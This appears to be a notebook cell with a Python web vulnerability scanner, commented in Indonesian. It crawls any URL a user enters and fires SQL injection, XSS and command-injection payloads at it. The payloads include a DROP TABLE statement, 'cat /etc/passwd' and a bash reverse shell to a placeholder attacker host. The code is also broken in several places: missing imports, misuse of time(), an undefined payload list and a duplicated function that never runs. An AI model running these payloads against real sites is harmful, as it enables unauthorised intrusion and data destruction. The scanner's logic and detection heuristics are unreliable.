In [ ]:
import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from colorama import Fore, Style, init
from tabulate import tabulate
import re
from time import time
from datetime import datetime

# Inisialisasi colorama
init(autoreset=True)

print(Fore.MAGENTA + """
 ██████╗ ██████╗ ██╗   ██╗ ██████╗  ██████╗ ██████╗ ███╗   ███╗
██╔════╝██╔═══██╗██║   ██║██╔════╝ ██╔═══██╗██╔══██╗████╗ ████║
██║     ██║   ██║██║   ██║██║  ███╗██║   ██║██████╔╝██╔████╔██║
██║     ██║   ██║██║   ██║██║   ██║██║   ██║██╔═══╝ ██║╚██╔╝██║
╚██████╗╚██████╔╝╚██████╔╝╚██████╔╝╚██████╔╝██║     ██║ ╚═╝ ██║
 ╚═════╝ ╚═════╝  ╚═════╝  ╚═════╝  ╚═════╝ ╚═╝     ╚═╝     ╚═╝
""")
print(Fore.CYAN + "Cyb00M - Advanced Vulnerability Scanner")
print(Style.BRIGHT + Fore.GREEN + "========================================")

# Meminta input URL dari pengguna
url = input(Fore.YELLOW + "Masukkan URL target: ")

# Validasi URL
def is_valid_url(url):
    regex = re.compile(
        r'^(http|https)://'  # Harus dengan http atau https
        r'([\w.-]+)'         # Domain atau IP
        r'(:\d+)?'           # Port opsional
        r'(/[\w./?%&=-]*)?$' # Jalur opsional
    )
    return re.match(regex, url)

if not url.startswith("http://") and not url.startswith("https://"):
    url = "http://" + url

if not is_valid_url(url):
    print(Fore.RED + "URL tidak valid. Harap masukkan URL yang benar.")
    exit()

# Payload untuk pengujian
sql_payloads = ["' OR '1'='1", "' UNION SELECT @@version--", "'; DROP TABLE users; --", "' OR IF(1=1, SLEEP(5), 0) --", "' UNION SELECT null, null, version() --"]
xss_payloads = ["<script>alert('XSS');</script>",  # Skrip dasar XSS
    "<img src='x' onerror='alert(\"XSS\")'>",  # XSS melalui atribut event
    "<svg/onload=alert('XSS')>",  # XSS melalui tag SVG
    "<body onload=alert('XSS')>",  # XSS melalui event body
    "<script>document.location='javascript:alert(\"XSS\")'</script>"]
command_injection_payloads = [";", "|", "&", "$(command)", "`command`", "||", "#", "echo", "touch", "ls", "cat /etc/passwd",
    "| /bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1", "echo vulnerable", "whoami"]
results = []

# Fungsi timestamp
def get_timestamp():
    return datetime.now().strftime("%Y-%m-%d %H:%M:%S")

# Fungsi crawling
def crawl(url):
    try:
        response = requests.get(url, timeout=5)
        response.raise_for_status()
        soup = BeautifulSoup(response.text, 'html.parser')
        links = set()
        for a_tag in soup.find_all('a', href=True):
            link = a_tag['href']
            if link.startswith('http'):
                links.add(link)
            elif link.startswith('/'):
                links.add(urljoin(url, link))
        return links
    except requests.RequestException as e:
        print(Fore.RED + f"Error saat crawling: {e}")
        return set()

# Filter URL yang memiliki parameter
def filter_urls_with_params(links):
    return [link for link in links if '?' in link]

# Deteksi SQL Injection
def test_sql_injection(url, payload):
    try:
        start_time = time()
        response = requests.get(url + "?id=" + payload, timeout=5)
        end_time = time()

        # Cek status code dan pesan error generik
        if response.status_code == 200:
            # Pola error spesifik database
            error_patterns = [
                "SQL syntax.*MySQL", "Warning.*mssql", 
                "Microsoft OLE DB Provider", "Unclosed quotation mark",
                "quoted string not properly terminated"
            ]
            for pattern in error_patterns:
                if re.search(pattern, response.text, re.IGNORECASE):
                    print(Fore.RED + "[SQLi] Pola kesalahan SQL terdeteksi.")
                    return True
            
            # Bandingkan panjang respons, jika berubah lebih dari ambang batas, kemungkinan SQLi
            original_length = len(requests.get(url, timeout=5).text)
            if abs(len(response.text) - original_length) > 50:  # Ambang batas panjang respons
                print(Fore.RED + "[SQLi] Perubahan panjang halaman terdeteksi.")
                return True
            
            # Cek untuk error generik atau error yang tidak spesifik
            error_patterns_generik = [
                "error", "forbidden", "unauthorized", "unexpected", "internal server error",
                "page not found", "not found", "permission denied", "Instagram", "Twetter", "X", "WhatsApp"
            ]
            for pattern in error_patterns_generik:
                if re.search(pattern, response.text, re.IGNORECASE):
                    print(Fore.GREEN + "[INFO] Halaman error generik ditemukan, kemungkinan pengamanan aktif.")
                    return False

            # Deteksi Blind SQL Injection berdasarkan waktu respon
            if abs(end_time - start_time) > 0.5:  # Misalnya, jika waktu respon berubah signifikan
                print(Fore.RED + "[INFO] Blind SQLi terdeteksi berdasarkan perbedaan waktu.")
                return True

            # Cek header respons untuk pola keamanan
            headers = response.headers
            if "X-Content-Type-Options" in headers or "X-XSS-Protection" in headers:
                print(Fore.GREEN + "[INFO] Pengamanan tambahan ditemukan (header).")

            # Jika tidak ada indikasi kesalahan, lanjutkan
            print(Fore.GREEN + "[INFO] Tidak ada indikasi kerentanannya ditemukan.")

    except requests.RequestException as e:
        print(Fore.RED + f"Error saat SQLi: {e}")
    return False

# Deteksi XSS
def test_xss(url, payload):
    try:
        response = requests.get(url, params={"input": payload}, timeout=5)
        if payload in response.text:
            # Mengecek jika script di-render dan dijalankan
            if re.search(r'<script.*?>' + re.escape(payload) + r'</script>', response.text):
                print(Fore.GREEN + "[XSS] Payload tercermin di respons!")
                return True
    except requests.RequestException as e:
        print(Fore.RED + f"Error saat XSS: {e}")
    return False

# Deteksi Command Injection
def test_payloads(url, payloads):
    for payload in payloads:
        response = requests.get(f"{url}?input={payload}")
        print(f"Testing with payload: {payload}")
        
        # Memeriksa status dan error response
        if response.status_code != 200:
            print(f"Potential vulnerability detected with payload: {payload}")
            print(f"Response: {response.text}")
        else:
            print(f"Payload {payload} did not trigger an error.")
        
        check_server_error(response)  # Memeriksa error server
        check_headers(response)  # Memeriksa header server

# Memeriksa apakah ada pesan error atau status kode yang mencurigakan
def check_server_error(response):
    if response.status_code >= 500:  # Error server
        print(f"Server error detected: Status code {response.status_code}")
        print("Response body:", response.text)
    elif "bash" in response.text or "sh" in response.text:
        print("Potential command execution detected in response body.")

# Memeriksa header untuk indikasi masalah
def check_headers(response):
    if "X-Powered-By" in response.headers:
        print(f"X-Powered-By header detected: {response.headers['X-Powered-By']}")
    if "Server" in response.headers:
        print(f"Server header detected: {response.headers['Server']}")

# Memvalidasi input pengguna untuk karakter berbahaya
def is_input_safe(user_input):
    dangerous_patterns = [";", "|", "&", "$", "`", ">", "<", "#", "\\"]
    for pattern in dangerous_patterns:
        if re.search(pattern, user_input):
            print(f"Input contains unsafe character: {pattern}")
            return False
    return True

# Fuzzing input dengan karakter acak untuk mendeteksi kerentanannya
def fuzz_input(url):
    random_input = ''.join(random.choices(string.ascii_letters + string.digits + string.punctuation, k=10))
    response = requests.get(f"{url}?input={random_input}")
    print(f"Fuzzing with input: {random_input}")
    check_server_error(response)  # Memeriksa error server

# Mengukur waktu respons untuk mendeteksi delay akibat eksekusi perintah
def measure_response_time(url):
    start_time = time.time()
    response = requests.get(url)
    elapsed_time = time.time() - start_time
    print(f"Response time: {elapsed_time} seconds")
    if elapsed_time > 2:  # Misalnya, jika waktu lebih dari 2 detik
        print("Possible indication of command injection: Slow response")

# Melakukan pelaporan jika ditemukan kerentanannya
def report_vulnerability(payload, response):
    print(f"[VULNERABILITY DETECTED] Payload: {payload}")
    print(f"Response code: {response.status_code}")
    print(f"Response body: {response.text}")
    print("Recommended action: Validate and sanitize input.")

# Fungsi utama untuk menguji aplikasi
def test_command_injection(url):
    # Memeriksa input dengan berbagai payload
    test_payloads(url, payloads)
    
    # Fuzzing input dengan karakter acak
    fuzz_input(url)
    
    # Mengukur waktu respons
    measure_response_time(url)

    # Memeriksa jika input yang tidak aman ada
    user_input = input("Enter a test input for validation: ")
    if not is_input_safe(user_input):
        print("Input is unsafe.")
    else:
        print("Input is safe.")

# # Menggunakan URL yang ingin diuji
# url = "http://example.com"  # Gantilah dengan URL yang ingin Anda uji
# test_command_injection(url)

# Jalankan pemeriksaan
urls_to_check = filter_urls_with_params([url] + list(crawl(url)))
print(Fore.GREEN + f"URL untuk diperiksa: {len(urls_to_check)}")

for target_url in urls_to_check:
    print(Fore.BLUE + f"Menguji: {target_url}")

    # SQL Injection
    for payload in sql_payloads:
        if test_sql_injection(target_url, payload):
            results.append([target_url, "SQL Injection", payload, get_timestamp(), "Critical"])
            break

    # XSS
    for payload in xss_payloads:
        if test_xss(target_url, payload):
            results.append([target_url, "XSS", payload, get_timestamp(), "High"])
            break

    # Mengubah definisi fungsi untuk menerima URL dan payload
def test_command_injection(url, payload):
    # Memeriksa input dengan berbagai payload
    test_payloads(url, payload)
    
    # Fuzzing input dengan karakter acak
    fuzz_input(url)
    
    # Mengukur waktu respons
    measure_response_time(url)

    # Memeriksa jika input yang tidak aman ada
    user_input = input("Enter a test input for validation: ")
    if not is_input_safe(user_input):
        print("Input is unsafe.")
    else:
        print("Input is safe.")


# Output hasil
if results:
    print(Fore.GREEN + "\nHasil Temuan Kerentanan:\n")
    print(tabulate(results, headers=["URL", "Jenis Kerentanan", "Payload", "Timestamp", "Severity"], tablefmt="grid"))
else:
    print(Fore.YELLOW + "\nTidak ada kerentanan yang terdeteksi.")